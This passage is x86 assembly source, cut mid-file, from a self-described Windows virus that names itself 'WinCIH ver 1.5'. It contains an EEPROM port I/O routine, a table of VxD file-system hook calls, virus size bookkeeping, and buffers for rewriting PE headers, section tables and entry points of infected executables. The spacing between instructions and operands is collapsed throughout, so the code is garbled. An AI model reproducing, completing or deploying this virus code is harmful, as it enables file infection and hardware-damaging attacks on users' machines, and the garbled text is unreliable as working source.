movbyte ptr [eax], 80h
mov[eax], cl
mov[ecx], al
ret
; ***************************
; * IO for EEPROM *
; ***************************
IOForEEPROM:
@10=IOForEEPROM
xchgeax, edi
xchgedx, ebp
outdx, eax
xchgeax, edi
xchgedx, ebp
inal, dx
BooleanCalculateCode=$
oral, 44h
xchgeax, edi
xchgedx, ebp
outdx, eax
xchgeax, edi
xchgedx, ebp
outdx, al
ret
; *********************************************************
; *Static Data *
; *********************************************************
LastVxDCallAddress=IFSMgr_Ring0_FileIO
VxDCallAddressTabledb00h
dbIFSMgr_RemoveFileSystemApiHook-_PageAllocate
dbUniToBCSPath-IFSMgr_RemoveFileSystemApiHook
dbIFSMgr_Ring0_FileIO-UniToBCSPath
VxDCallIDTabledd00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize=($-VxDCallIDTable)/04h
; *********************************************************
; * Virus Version Copyright *
; *********************************************************
VirusVersionCopyright db 'WinCIH ver 1.5 by TATUNG, Thailand'
; *********************************************************
; *Virus Size *
; *********************************************************
VirusSize=$
;+ SizeOfVirusCodeSectionTableEndMark(04h)
;+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
;+ SizeOfTheFirstVirusCodeSectionTable(04h)
; *********************************************************
; *Dynamic Data *
; *********************************************************
VirusGameDataStartAddress=VirusSize
@6=VirusGameDataStartAddress
OnBusydb0
FileModificationTimedd?
FileNameBufferdbFileNameBufferSize dup(?)
@7=FileNameBuffer
DataBuffer=$
@8=DataBuffer
NumberOfSectionsdw?
TimeDateStampdd?
SymbolsPointerdd?
NumberOfSymbolsdd?
SizeOfOptionalHeaderdw?
_Characteristicsdw?
Magicdw?
LinkerVersiondw?
SizeOfCodedd?
SizeOfInitializedDatadd?
SizeOfUninitializedDatadd?
AddressOfEntryPointdd?
BaseOfCodedd?
BaseOfDatadd?
ImageBasedd?
@9=$
SectionAlignmentdd?
FileAlignmentdd?
OperatingSystemVersiondd?
ImageVersiondd?
SubsystemVersiondd?
Reserveddd?
SizeOfImagedd?
SizeOfHeadersdd?
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint=DataBuffer; DWORD
SizeOfImageHeaderToWrite= 04h
StartOfSectionTable=@9
SectionName=StartOfSectionTable; QWORD
VirtualSize=StartOfSectionTable+08h; DWORD
VirtualAddress=StartOfSectionTable+0ch; DWORD
SizeOfRawData=StartOfSectionTable+10h; DWORD
PointerToRawData=StartOfSectionTable+14h; DWORD
PointerToRelocations=StartOfSectionTable+18h; DWORD
PointerToLineNumbers=StartOfSectionTable+1ch; DWORD
NumberOfRelocations=StartOfSectionTable+20h; WORD
NumberOfLinenNmbers=StartOfSectionTable+22h; WORD
Characteristics=StartOfSectionTable+24h; DWORD
SizeOfScetionTable=Characteristics+04h-SectionName
; *********************************************************
; *Virus Total Need Memory *
; *********************************************************
VirusNeedBaseMemory=$
VirusTotalNeedMemory=@9
;+ NumberOfSections(??)*SizeOfScetionTable(28h)
;+ SizeOfVirusCodeSectionTableEndMark(04h)
;+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
;+ SizeOfTheFirstVirusCodeSectionTable(04h)
; *********************************************************
VirusGame ENDS
END FileHeader
